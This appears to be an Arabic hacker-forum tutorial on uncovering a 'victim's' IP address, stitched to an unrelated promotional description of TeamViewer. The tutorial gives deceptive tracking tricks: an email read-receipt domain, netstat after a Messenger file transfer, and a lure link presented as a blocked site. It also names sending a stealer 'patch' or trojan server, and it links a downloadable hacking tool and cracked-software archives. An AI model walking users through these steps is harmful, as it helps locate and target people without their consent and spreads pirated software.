للمرسل أنسخ الرقم ، ثم أذهب ألى الموقع التاليhttp://www.ripe.net/perl/whois وضع الرقم أمام Enter search criteria سوف يظهر لك معلومات عن ذلك الشخص وعن الجهة التي تستطيع مخاطبتها ومعلومات أخرى ********************* طريقة اخرى: عندما تريد أرسال الرساله يجب ان تكتب بعد ايميل الضحيةconfirm.to مثلا : إذا كان ايميل الضحية aaa_aaaaaa@hotmail.com يجب ان تكتبi aaa_aaaaaa@hotmail.com.confirm.to ثم ترسل الرسالة وعند ما يفتح الضحية البريد المرسل له سيصلك ايميل فيه ايبي الضحية: :001: ________طريقة استخراج ايبي الضحيه من الماسنجر _______ في الحقيقه هناك عدة طرق سأذكر منها :- (((( 1 )))) طريقة للحصول عليه من الماسنجر : في البداية أرسل اي ملف يفضل ان يكون اكبر من 25kb للشخص الذي تريد اي بيه الخاص ثم اذهب الى START RUN ثم ثم اكتب command سوف تظهر لك نافذة دوس اكتب فيها الامر: netstat -n مع ملاحظة المسافةبين الخط و الكلمة سوف يظهر لك عدد من الآي بيز غالباً الاي بي الاخير هو للشخص ويكون على يدك اليمين في الأسفل تحت كلمة Foreign Address والباقي على اليسار تكون لك ------------------- (((( 2 )))) بدون تحميل برامج او اى شئ فى حال وجود عندك برامج حماية زي zonealarm - black ice - sagnet - firewall والمزيد... والخطوات كالاتي 1-تجيب الاى بى الخاص بيك 2- تكتب الاي بى بتاعك بالشكل دا ( Hyper Link ) http:// 212.34.34.78 3- طبعا الارقام السابقه افتراضيه 4- بعد ما تحول الآى بى الخاص بيك على شكل لينك او وصلة تطلب من الضحيه الضغط عليه ( العب عليه وقله دا موقع فيه كذا وكذا وهو محجوب ولو ضغط على الوصلة بيفتح الموقع ) 5- الباحث اللى عند الضحيه راح يدفعه ناحيتك ناحيه اتصال جهازك بالنت 6- برنامج الفاير وول راح يعطيك اشاره انك متعرض لمحاولة اختراق من آى بى خاص بالشخص و وكدا تحصل على الآى بى من دون برامج --------------------- (((( 3 )))) من خلال هذا البرنامج http://*******************/HackerZ_master/mesn.zip طريقة البرنامج اول ماتفتحه وتفكه من الضغط بيجيك مربع على اليسار اكتب فيه الآي بي بتاعك بعدين اظغط الزر اللي تحته convert IP address بعدين اظغط على الزر Listen بيجيك وصله تحت تلقاها رقم طويل انسخها واديها اللي قاعد تكلمه في المسنجر وانتظر شوي هيجيلك رقم الآي بي بتاعه في الجهه اليمنى ---------------------------------- طرق مشهورة ومعروفة لدى البعض : 1 تخلي اللي قاعد تكلمه يطلب منك محادثة بالنت ميتنج وهايجيلك الآي بي بدون تعب 2 طلب محادثة معه فإذا طلب هايجى الآي بي بتاعك وبتاعهوإذا هو عمل محادثة وطلبت هاييجى الآي بي بتاعك وبتاعه 3 ارسال باتش سارق 4 ارساله سيرفر يكون معد على بريدك ويوصلك الآي بي حسب الإعدادات اللي تقوم فيها ________ طريقة استخراج الأيبي للمواقع ________ START ثم RUN نكتب في داخل المستطيل command ها يفتح الدوس ثم نكتب pinghttp://www.xxxx.com/ لاحظ وجود مسافة بين الموقع والبينج xxxx: تعني اسم الموقع المراد معرفة الايبي بتاعه هذه الحركة تظهر اي بي الموقع وتستطيع بها ان تفتح معظم المواقع المحجوبة ---------------------------- لمعرفة مصدر رسالة ومعلومات عن جهاز الضحية من عنوان الآي بي، المواقع التالية تقدم هذه الخدمات: -1-http://www.leader.ru/secure/who.html -2-http://www.leader.ru/secure -3- http://www.ripe.net/perl/whois-4- http://www.internic.net/whois.html -5-http://www.nic.mil/dodnic -6- http://www.apnic.net/ والآن مافائدة كشفك لآي بي الضحية ؟؟! ها نقول الجواب في ثلاث نقاط هي: ********************** اولا:جلب المعلومات: =========== بعد الحصول على آي بي الضحية يمكنك من جلب معلومات عن وذلك عن طريق البرامج التالية : 1- برنامجSmart Who Is و يمكنك البحث عن البرنامج من موقع http://www.downloads.com/ 2-او برنامج WhereIsIP 2.20 الحجم: 610 كيلو الشرح : بعد تنصيب البرنامج .. فك الكراك في مجلد البرنامج (يجب ان يكون البرنامج مغلق قبل فتح الكراك) التحميل:http://active.jufsoft.com/download/whereisip2.exe اوhttp://www.jufsoft.com/download/whereisip2.exe الكراك :http://wmw.andr.net/andr-crc/w/FFF-W...P.2.20_CRK.zip اوhttp://wmw.crackz.ws/hjlascuuodfwO/w/tsrh-wip220.zip --------------------------- 3-أو من مواقع كثيرة وسوف أذكر أفضلها وأشهرها وهوhttp://www.ripe.net/whois ------------------------------- 4-أو من الـDos كيف؟ إذهب إلى DoS اكتب ..cd حتى تخرج من مجلد Documents أو أي مجلد كان بعدها اكتب الأمر tracert وبعده ضع ip الضحية مباشرة لنفرض أن آي بي الضحية هو:212.55.63.10 نضعه بعد الأمر ليصبح بهذا الشكل tracert 212.55.63.10 (لاحظ وجود مسافة بين الايبي والكلمة) ونضغط إدخال Enter وتنتظر المعلومات .......)barf ---------------------------------- 5- او من هذا البرنامج الاسم : VisualRoute 7.1d مميزاته: تضع له عنوان او رقم الاي بي او ايميل و يجيبلك : 1 - الدولة 2 - الايبي لصاحب الايميل 3 - الشركة المشترك بها 4 - يضع لك خريطة حتى اذا لم تعرف الدولة تكبرها على الخريطة

شرح برنامج teamviewer للتحكم عن بعد في الاجهزة


يعتبر برنامج teamviewer من اروع برامج تحكم في الاجهزة بموافقة الشخص في 

مساعدته في اصلاح شئ او اخد اشياء معينة والكتير اما مميزاته ساتطرق اليها بعد 






 لتقديم الدعم عبر الإنترنت،عن بعد في كمبيوتر الطرف الآخر أو يمكنك عرض شاشتك على العميل 

دون القلق بشأن الجدران النارية وعناوين IP وتكويد عناوين الشبكة.
بإمكان تطبيق TeamViewer الاتصال بأي كمبيوتر أو سيرفر في ثوان معدودة. حيث يتسنى لك


التحكم عن بعد في كمبيوتر الطرف الآخر كما لو كنت تجلس أمامه مباشرة.




ميزات البرنامج:

  1. برنامج TeamViewer يتيح واجهة استخدام مرتبة وسهلة الاستخدام. وعليك الاختيار سواء كنت
  2. تريد التحكم عن بعد في كمبيوتر الطرف الآخر، أو مشاركة سطح مكتبك مع طرف آخر، أو مجرد
  3. نقل الملفات دون مشاركة سطح مكتبك.
  4. يُتاح العمل الجماعي بشكل فوري من خلال لائحة المشاركين الجذابة. في لائحة المشاركين في
  5. برنامج TeamViewer يمكنك بشكل دائم معرفة الزملاء المتواجدين – وبنقرة زر واحدة فقط من
  6. الفأرة يمكنك الاتصال بهم. ويتم تخزين لوائح المشاركين بشكل مركزي حيث يمكنك الوصول إليهم
  7. من خلال أي كمبيوتر تستخدم فيه برنامج TeamViewer.
  8. جميع إصدارات البرنامج تشتمل على إمكانية نقل ونسخ الملفات والمجلدات. وللعمل بأقصى
  9. سرعة يتم ضغط جميع المحتويات أوتوماتيكيا قبل نقلها.
  10. برنامج TeamViewer يتيح لك الكثير من الخيارات لمواءمة البرنامج حسبما تريده بالضبط. يمكنك
  11.  إعطاء الأولوية لسرعة أو جودة العرض، أو حتى تخصيص رسالة البريد الإلكتروني التي ترسلها
  12.  لدعوة الأطراف الأخرى.


تفضل بتحميل البرنامج وذلك بالدخول إلى صفحة الموقع TeamViewer